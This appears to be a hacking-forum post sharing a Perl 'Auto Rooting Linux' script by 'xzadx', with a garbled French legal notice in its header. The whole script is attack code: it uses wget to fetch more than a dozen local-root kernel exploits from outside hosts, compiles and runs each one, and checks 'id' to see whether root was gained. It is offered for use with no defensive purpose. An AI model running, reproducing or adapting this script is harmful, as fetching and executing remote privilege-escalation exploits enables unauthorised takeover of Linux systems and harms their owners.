-
Grayman
#Zarar verme Psikolejisi. ~
Kod:
#!/bin/perl
# Auto Rooting Linux
# By xzadx
# Local root 2007 2008 2009 for Linux Priv8
# Usage: perl xzadx.pl
# Version: 1.0 !!!
# Tout usage des informations diffus************************************65533;es par Metropolis est soumi ************************************65533; autorisation pr************************************65533;alable et express.
# a violation de ces dispositions imp************************************65533;ratives soumet le contrevenant,
# et toutes personnes responsables, aux peines p************************************65533;nales et civiles pr************************************65533;vues par la loi fran************************************65533;aise.
#
# Info:la commande gcc et wget doit ************************************65533;tre activ************************************65533;e.
# {
system("uname -a");
system("wget www.tux-planet.fr/public/hack/exploits/kernel/sock-sendpage-local-root-exploit.tar.gz");
system("tar zxvf sock-sendpage-local-root-exploit.tar.gz");
system("cd sock-sendpage-local-root-exploit");
system("chmod 755 wunderbar_emporium.sh");
system("sh wunderbar_emporium.sh");
system("id");
system("cat /proc/sys/vm/mmap_min_addr");
print "Please Wait ...";
system("wget www.tux-planet.fr/public/hack/exploits/kernel/local-root-exploit-gayros.c");
system("gcc -o gayros local-root-exploit-gayros.c");
system("chmod 777 gayros");
system("./gayros");
system("id");
system("wget www.tux-planet.fr/public/hack/exploits/kernel/vmsplice-local-root-exploit.c");
system("gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c");
system("chmod 777 vmsplice-local-root-exploit");
system("./vmsplice-local-root-exploit");
system("id");
system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/x2");
system("chmod 777 x2");
system("./x2");
system("id");
system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/x");
system("chmod 777 x");
system("./x");
system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/uselib24");
system("chmod 777 uselib24");
system("./uselib24");
system("id");
system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/root2");
system("chmod 777 root2");
system("id");
system("./root2");
system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/kmod2");
system("chmod 777 kmod2");
system("./kmod2");
system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/h00lyshit");
system("chmod 777 h00lyshit");
system("./h00lyshit");
system("id");
system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/exp.sh");
system("chmod 755 exp.sh");
system("sh exp.sh");
system("id");
system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/elflbl");
system("chmod 777 elflbl");
system("./elflbl");
system("id");
system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/cw7.3");
system("chmod 777 cw7.3");
system("./cw7.3");
system("id");
system("wget http://rmccurdy.com/scripts/downloaded/localroot/2.4.x/newlocal");
system("chmod 777 newlocal");
system("./newlocal");
system("id");
system("uname -a");
system("id;pwd");
print "XP";
}